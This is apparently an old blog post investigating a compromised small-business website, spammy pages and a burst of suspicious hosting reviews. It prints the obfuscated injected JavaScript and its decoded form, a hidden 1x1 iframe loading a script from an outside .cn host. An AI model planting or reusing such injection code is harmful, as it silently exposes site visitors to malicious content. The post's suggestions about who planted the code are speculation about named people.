Hmmm after a little bit more checking it looks like Brad and his website was the host of some rather curious pages I wonder if he even knew about them?

http://web.archive.org/web/*/instrumentsolutions.com.au/*

Check out the spammy pages. When I did a bit of a google search for those pages they were spammed out like crazy. Who ever got access to their site had posted spam on their site and then proceeded to gain 100′s of spammy links to those pages

Google Results

Going through the logs I see some unusual stuff so while I am checking that out I find that http://www.webhostingstuff.com/review/MDWebHosting.html has had a few updates to its Reviews now all these reviews are in a close nit of time 1 on the 3rd December 2008, 2 on the 4th December 2008, 1 on the 9th December 2008, and finally 1 on the 12th December (now this looks suss to me but who am I to argue) all these kind soles may have felt the need to put in positive reviews all at the same time. I don’t own the site and don’t have access to the ip logs so I am sure the owners of webhostingstuff looked into it and saw they were legit?

Anyways back to my story. The post on the 12th of December was from Brad (instrumentsolutions.com.au) now as far as I can tell (and I could be wrong) Brad is a Director, designer and technical support for the domain and business. He gives MD Web Hosting a glowing report 5 stars for Overall Rating, Uptime & Reliability, Technical Support and Customer Service. He must be very happy with MD Web Hosting.

Now you must be saying “SO WHAT” well the interesting thing is I wonder who injected malicious code into their domain was it

• someone hacked their site? are they using a sloppy script?
  
• brad put it in there for some reason? why would you?
  
• or did someone hack MD Web Hosting server and inject the code?

Now I am not sure who put it in there luckily the infection has been neutralised. I am sure from past interactions with MD that they will blame Brad for this problem.

The offending code has be obscufated

script type="text/javascript">!--
document.write(unescape('%3c%69%
66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%68%6f
%73%74%69%6e%67%6d%64%2e%63%6e%2f%73%2f%6f%75%74%2e%70%68%70
%3f%73%5f%69%64%3d%31%22%20%77%69%64%74%68%3d%31%20%68%65%69
%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c
%69%74%79%3a%20%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d
%65%3e'))
// -->


Which in turns produces this iframe

script type="text/javascript">!--
document.write(unescape('iframe src="
http://hostingmd.cn/s/out.php?s_id=1" mce_src="
http://hostingmd.cn/s/out.php?s_id=1"
width=1 height=1 style="visibility: hidden" mce_style="visibility: hidden">
/iframe>'))
// -->


I wonder should I send an email is it worth it?